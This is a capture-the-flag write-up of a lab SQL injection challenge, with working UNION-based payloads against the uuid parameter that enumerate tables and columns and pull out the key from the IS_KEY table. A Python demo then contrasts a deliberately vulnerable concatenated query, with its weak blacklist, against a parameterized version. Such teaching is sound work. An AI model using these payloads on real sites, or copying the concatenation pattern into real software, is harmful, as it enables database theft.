Exercise 1: SQL injection
The challenge is shown below; we need to find the key value through SQL injection.
Opening the challenge, we see the following page, with the parameter-handling source attached below it. The injection point should be the uuid parameter. From the source we can see that the challenge filters out '--' and '#'.
Construct the statement ' union select 1,2,3,4,5 or '1' = '1 to guess the number of columns.
At 6 the page returns normally, so we can guess that there are 6 columns, and that 2 and 3 are the display positions.
Construct a statement to display the table names:
http://192.168.100.150:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6 or '1' = '1
Then look at the columns of the IS_KEY table:
http://192.168.100.150:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 'IS_KEY' and table_schema=database()),3,4,5,6 or '1' = '1
Finally, retrieve the key value:
http://192.168.100.150:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(haha) from IS_KEY),3,4,5,6 or '1' = '1
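Why the challenge's filter does not help: it strips the two comment tokens but leaves the quote character, so string concatenation still lets the final payload above rewrite the query, while a bound parameter treats the same input as plain data. This is an added example, not the challenge's own source; the six-column `start` table, the `lookup_*` functions and the sample flag value are constructed here (only the IS_KEY table, its haha column and the uuid are from the writeup), and SQLite stands in for the real database.

```python
import sqlite3

# Constructed sample schema mirroring the writeup: a six-column table looked up
# by uuid, plus a separate table holding the flag (table/column names from the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE start(id INTEGER, title TEXT, body TEXT, c4 TEXT, c5 TEXT, uuid TEXT);
        INSERT INTO start VALUES (1, 'Welcome', 'Practice 1', '', '',
                                  '983fd952-df4e-4b63-946f-f2e6bb0327d6');
        CREATE TABLE IS_KEY(haha TEXT);
        INSERT INTO IS_KEY VALUES ('KEY{constructed-sample}');
    """)
    return conn

# The challenge's filter as described on the page: remove '--' and '#', nothing else.
def blacklist(value):
    return value.replace("--", "").replace("#", "")

def lookup_vulnerable(conn, uuid):
    # String concatenation: the quote closes the literal and the rest is parsed as SQL,
    # so a UNION can append rows from any other table into display positions 2 and 3.
    sql = ("SELECT id, title, body, c4, c5, uuid FROM start WHERE uuid='"
           + blacklist(uuid) + "'")
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, uuid):
    # Bound parameter: the input is compared as a value and never parsed as SQL,
    # so the same payload simply matches no row.
    sql = "SELECT id, title, body, c4, c5, uuid FROM start WHERE uuid=?"
    return conn.execute(sql, (blacklist(uuid),)).fetchall()

# The final payload from the writeup (value of the uuid parameter after the real uuid).
PAYLOAD = "x' union select 1,(select group_concat(haha) from IS_KEY),3,4,5,6 or '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", lookup_vulnerable(db, PAYLOAD))      # flag lands in column 2
    print("parameterized:", lookup_parameterized(db, PAYLOAD))   # no rows
```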